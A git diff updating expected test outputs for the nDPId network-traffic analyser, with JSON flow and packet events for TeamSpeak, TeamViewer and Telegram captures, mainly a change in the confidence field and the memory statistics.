00690{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"teamspeak3.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":946745680740,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":230,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":230,"pkt_l4_len":196,"thread_ts_msec":946745680740,"pkt":"REREREREZmZmZmZmCABFAADYyVlAAHgRnZkKAAABCgAAAs\/DJwMAxJv3eXRj6JO6fmAAAAAAIp10i0Wqe++5nv6tCBm6z0HgFqIVc9rwk+JLXtHwnSIOS9qVPnECnykaLcJG8hX08WvnftBqcJmqRqZMetkjLRcZ56Qb0yr7w3DD9zi02VU5x7l+AWx+kCtuxsALbdDKU+g3u9+7M\/R0k3h6Cj2dgqVHMwYrJL8wicW8AZK\/KfPOtEoKiRpNuYkxO9WWvZSdqdAZVZGl4X6vDNBIwrDu7kll5TuFIGNHjpSa9tdfD6M="} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"teamspeak3.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":946745681306,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":946745681306,"pkt":"REREREREZmZmZmZmCABFAAA+yX1AAHgRng8KAAABCgAAAs\/DJwMAKptdVFMzSU5JVDEAZQAAiA3QV2YAX1kW4K3na2IAAAAAAAAAAA=="} -00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":13,"source":"teamspeak3.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":946745680740,"flow_last_seen":946745717746,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":188,"flow_tot_l4_payload_len":1365,"flow_avg_l4_payload_len":105,"midstream":0,"thread_ts_msec":946745717746,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"10.0.0.2","src_port":53187,"dst_port":9987,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TeamSpeak","breed":"Acceptable","category":"VoIP"}} +00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":13,"source":"teamspeak3.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":946745680740,"flow_last_seen":946745717746,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":188,"flow_tot_l4_payload_len":1365,"flow_avg_l4_payload_len":105,"midstream":0,"thread_ts_msec":946745717746,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"10.0.0.2","src_port":53187,"dst_port":9987,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TeamSpeak","breed":"Acceptable","category":"VoIP"}} 00557{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":13,"source":"teamspeak3.pcap","alias":"nDPId-test","packets-captured":13,"packets-processed":13,"total-skipped-flows":0,"total-l4-payload-len":1365,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":946745717746} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 13/13 @@ -15,9 +15,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5869820 bytes -~~ total memory freed........: 5869820 bytes -~~ total allocations/frees...: 118127/118127 +~~ total memory allocated....: 6003454 bytes +~~ total memory freed........: 6003454 bytes +~~ total allocations/frees...: 120889/120889 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 466 chars ~~ json string max len.......: 695 chars diff --git a/test/results/teamviewer.pcap.out b/test/results/teamviewer.pcap.out index 547772910..79611860c 100644 --- a/test/results/teamviewer.pcap.out +++ b/test/results/teamviewer.pcap.out @@ -3,15 +3,15 @@ 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"teamviewer.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":330297,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":330297,"pkt":"UlQAEjUCCAAns+YuCABFAAA8OlxAAEAGTq0KAAIPovoCqouUFzIpaMgpAAAAAKAC+vCAjgAAAgQFtAQCCAosLVpIAAAAAAEDAwc="} 00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"teamviewer.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":330433,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":330433,"pkt":"CAAns+YuUlQAEjUCCABFAAAsCdUAAEAGv0Si+gKqCgACDxcyi5QCaioBKWjIKmAS\/\/8lnwAAAgQFtA=="} 00445{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"teamviewer.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":330434,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":330434,"pkt":"UlQAEjUCCAAns+YuCABFAAAoOl1AAEAGTsAKAAIPovoCqouUFzIpaMgqAmoqAlAQ+vBCawAAAAAAAAAA"} -00627{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"teamviewer.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":330297,"flow_last_seen":330434,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":9,"midstream":0,"thread_ts_msec":330434,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"162.250.2.170","src_port":35732,"dst_port":5938,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TeamViewer","breed":"Acceptable","category":"RemoteAccess"}} +00627{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"teamviewer.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":330297,"flow_last_seen":330434,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":9,"midstream":0,"thread_ts_msec":330434,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"162.250.2.170","src_port":35732,"dst_port":5938,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TeamViewer","breed":"Acceptable","category":"RemoteAccess"}} 00561{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":238,"source":"teamviewer.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":520136,"flow_last_seen":520136,"flow_idle_time":200000,"flow_min_l4_payload_len":96,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":520136,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"93.47.224.241","src_port":34417,"dst_port":36037,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00554{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":238,"source":"teamviewer.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":520136,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":138,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":138,"pkt_l4_len":104,"thread_ts_msec":520136,"pkt":"UlQAEjUCCAAns+YuCABFAAB8z5cAAEARYKoKAAIPXS\/g8YZxjMUAaPehAAAAAAAAAAAAAAMXJEdQAAUAAAAAAAAAAAAAADkzLjQ3LjIyNC4yNDEAAADFjAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} 00553{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":239,"source":"teamviewer.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":520148,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":138,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":138,"pkt_l4_len":104,"thread_ts_msec":520148,"pkt":"CAAns+YuUlQAEjUCCABFAAB8FPQAAEARG05dL+DxCgACD4zFhnEAaPihAAAAAAAAAAAAAAMXJEdQAAUAAAAAAAAAAAAAADkzLjQ3LjIyNC4yNDEAAADEjAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} 01045{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":240,"source":"teamviewer.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":520160,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":506,"pkt_l4_len":472,"thread_ts_msec":520160,"pkt":"CAAns+YuUlQAEjUCCABFAAHsFPcAAEARGdtdL+DxCgACD4zFhnEB2EYbAAAAAAAAAAAAAAMXJEfAAQQAAAA7Jmk0CQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00879{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":241,"source":"teamviewer.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":520136,"flow_last_seen":520160,"flow_idle_time":200000,"flow_min_l4_payload_len":96,"flow_max_l4_payload_len":1024,"flow_tot_l4_payload_len":1680,"flow_avg_l4_payload_len":420,"midstream":0,"thread_ts_msec":520160,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"93.47.224.241","src_port":34417,"dst_port":36037,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"30": {"risk":"Desktop\/File Sharing","severity":"Low","risk_score": {"total":1000,"client":800,"server":200}}},"confidence": {"4":"DPI"},"proto":"TeamViewer","breed":"Acceptable","category":"RemoteAccess"}} +00879{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":241,"source":"teamviewer.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":520136,"flow_last_seen":520160,"flow_idle_time":200000,"flow_min_l4_payload_len":96,"flow_max_l4_payload_len":1024,"flow_tot_l4_payload_len":1680,"flow_avg_l4_payload_len":420,"midstream":0,"thread_ts_msec":520160,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"93.47.224.241","src_port":34417,"dst_port":36037,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"30": {"risk":"Desktop\/File Sharing","severity":"Low","risk_score": {"total":1000,"client":800,"server":200}}},"confidence": {"6":"DPI"},"proto":"TeamViewer","breed":"Acceptable","category":"RemoteAccess"}} 00558{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1283,"source":"teamviewer.pcap","alias":"nDPId-test","packets-captured":1283,"packets-processed":1282,"total-skipped-flows":0,"total-l4-payload-len":643545,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":0,"total-updates":0,"current-active-flows":2,"total-active-flows":2,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":12,"global_ts_msec":633881} -00924{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1298,"source":"teamviewer.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":1009,"flow_first_seen":520136,"flow_last_seen":558067,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":1024,"flow_tot_l4_payload_len":520494,"flow_avg_l4_payload_len":515,"midstream":0,"thread_ts_msec":729854,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"93.47.224.241","src_port":34417,"dst_port":36037,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"30": {"risk":"Desktop\/File Sharing","severity":"Low","risk_score": {"total":1000,"client":800,"server":200}}},"confidence": {"4":"DPI"},"proto":"TeamViewer","breed":"Acceptable","category":"RemoteAccess"}} -00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1298,"source":"teamviewer.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":289,"flow_first_seen":330297,"flow_last_seen":729854,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":125458,"flow_avg_l4_payload_len":434,"midstream":0,"thread_ts_msec":729854,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"162.250.2.170","src_port":35732,"dst_port":5938,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TeamViewer","breed":"Acceptable","category":"RemoteAccess"}} +00924{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1298,"source":"teamviewer.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":1009,"flow_first_seen":520136,"flow_last_seen":558067,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":1024,"flow_tot_l4_payload_len":520494,"flow_avg_l4_payload_len":515,"midstream":0,"thread_ts_msec":729854,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"93.47.224.241","src_port":34417,"dst_port":36037,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"30": {"risk":"Desktop\/File Sharing","severity":"Low","risk_score": {"total":1000,"client":800,"server":200}}},"confidence": {"6":"DPI"},"proto":"TeamViewer","breed":"Acceptable","category":"RemoteAccess"}} +00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1298,"source":"teamviewer.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":289,"flow_first_seen":330297,"flow_last_seen":729854,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":125458,"flow_avg_l4_payload_len":434,"midstream":0,"thread_ts_msec":729854,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"162.250.2.170","src_port":35732,"dst_port":5938,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TeamViewer","breed":"Acceptable","category":"RemoteAccess"}} 00560{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":1298,"source":"teamviewer.pcap","alias":"nDPId-test","packets-captured":1298,"packets-processed":1298,"total-skipped-flows":0,"total-l4-payload-len":645952,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":2,"total-idle-flows":2,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":15,"global_ts_msec":729854} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 1298/1298 @@ -21,9 +21,9 @@ ~~ total active/idle flows...: 2/2 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5908162 bytes -~~ total memory freed........: 5908162 bytes -~~ total allocations/frees...: 119417/119417 +~~ total memory allocated....: 6041796 bytes +~~ total memory freed........: 6041796 bytes +~~ total allocations/frees...: 122179/122179 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 450 chars ~~ json string max len.......: 1050 chars diff --git a/test/results/telegram.pcap.out b/test/results/telegram.pcap.out index 8a27fd582..0622785df 100644 --- a/test/results/telegram.pcap.out +++ b/test/results/telegram.pcap.out @@ -2,101 +2,101 @@ 00548{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"telegram.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1588779596451} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"telegram.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779596451,"flow_last_seen":1588779596451,"flow_idle_time":200000,"flow_min_l4_payload_len":279,"flow_max_l4_payload_len":279,"flow_tot_l4_payload_len":279,"flow_avg_l4_payload_len":279,"midstream":0,"thread_ts_msec":1588779596451,"l3_proto":"ip4","src_ip":"192.168.0.1","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00821{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"telegram.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1588779596451,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":321,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":321,"pkt_l4_len":287,"thread_ts_msec":1588779596451,"pkt":"\/\/\/\/\/\/\/\/2A0X1lWrCABFAAEzGJVAAEARYHzAqAAB\/\/\/\/\/wBEAEMBHwAAAQEGANsCwWgAAIAAAAAAAAAAAAAAAAAAAAAAANgNF9ZVqwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEBNwIBAwwJVEwtU0cxMTZFPAlUTC1TRzExNkU9BwHYDRfWVav\/"} -00718{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"telegram.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779596451,"flow_last_seen":1588779596451,"flow_idle_time":200000,"flow_min_l4_payload_len":279,"flow_max_l4_payload_len":279,"flow_tot_l4_payload_len":279,"flow_avg_l4_payload_len":279,"midstream":0,"thread_ts_msec":1588779596451,"l3_proto":"ip4","src_ip":"192.168.0.1","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"},"dhcp": {"hostname":"tl-sg116e","fingerprint":"1,3","class_ident":"TL-SG116E"}} +00718{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"telegram.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779596451,"flow_last_seen":1588779596451,"flow_idle_time":200000,"flow_min_l4_payload_len":279,"flow_max_l4_payload_len":279,"flow_tot_l4_payload_len":279,"flow_avg_l4_payload_len":279,"midstream":0,"thread_ts_msec":1588779596451,"l3_proto":"ip4","src_ip":"192.168.0.1","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"},"dhcp": {"hostname":"tl-sg116e","fingerprint":"1,3","class_ident":"TL-SG116E"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"telegram.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779596464,"flow_last_seen":1588779596464,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1588779596464,"l3_proto":"ip4","src_ip":"192.168.1.53","dst_ip":"239.255.255.250","src_port":54306,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00608{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"telegram.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1588779596464,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1588779596464,"pkt":"AQBef\/\/6wJrQLWJ0CABFAACavyQAAAERSFfAqAE17\/\/\/+tQiB2wAhkPyTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANCk1BTjogInNzZHA6ZGlzY292ZXIiDQpNWDogMQ0KU1Q6IHVybjpkaWFsLW11bHRpc2NyZWVuLW9yZzpzZXJ2aWNlOmRpYWw6MQ0KDQoA"} -00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"telegram.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779596464,"flow_last_seen":1588779596464,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1588779596464,"l3_proto":"ip4","src_ip":"192.168.1.53","dst_ip":"239.255.255.250","src_port":54306,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"telegram.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779596464,"flow_last_seen":1588779596464,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1588779596464,"l3_proto":"ip4","src_ip":"192.168.1.53","dst_ip":"239.255.255.250","src_port":54306,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"telegram.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779596464,"flow_last_seen":1588779596464,"flow_idle_time":200000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":45,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1588779596464,"l3_proto":"ip4","src_ip":"192.168.1.53","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"telegram.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1588779596464,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":87,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":87,"pkt_l4_len":53,"thread_ts_msec":1588779596464,"pkt":"AQBeAAD7wJrQLWJ0CABFAABJuJEAAAERXjrAqAE14AAA+xTpFOkANQuaAAAAAAABAAAAAAAAEF9zcG90aWZ5LWNvbm5lY3QEX3RjcAVsb2NhbAAADAAB"} -00685{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"telegram.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779596464,"flow_last_seen":1588779596464,"flow_idle_time":200000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":45,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1588779596464,"l3_proto":"ip4","src_ip":"192.168.1.53","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_spotify-connect._tcp.local"}} +00685{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"telegram.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779596464,"flow_last_seen":1588779596464,"flow_idle_time":200000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":45,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1588779596464,"l3_proto":"ip4","src_ip":"192.168.1.53","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_spotify-connect._tcp.local"}} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4,"source":"telegram.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779596465,"flow_last_seen":1588779596465,"flow_idle_time":200000,"flow_min_l4_payload_len":311,"flow_max_l4_payload_len":311,"flow_tot_l4_payload_len":311,"flow_avg_l4_payload_len":311,"midstream":0,"thread_ts_msec":1588779596465,"l3_proto":"ip4","src_ip":"192.168.1.69","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 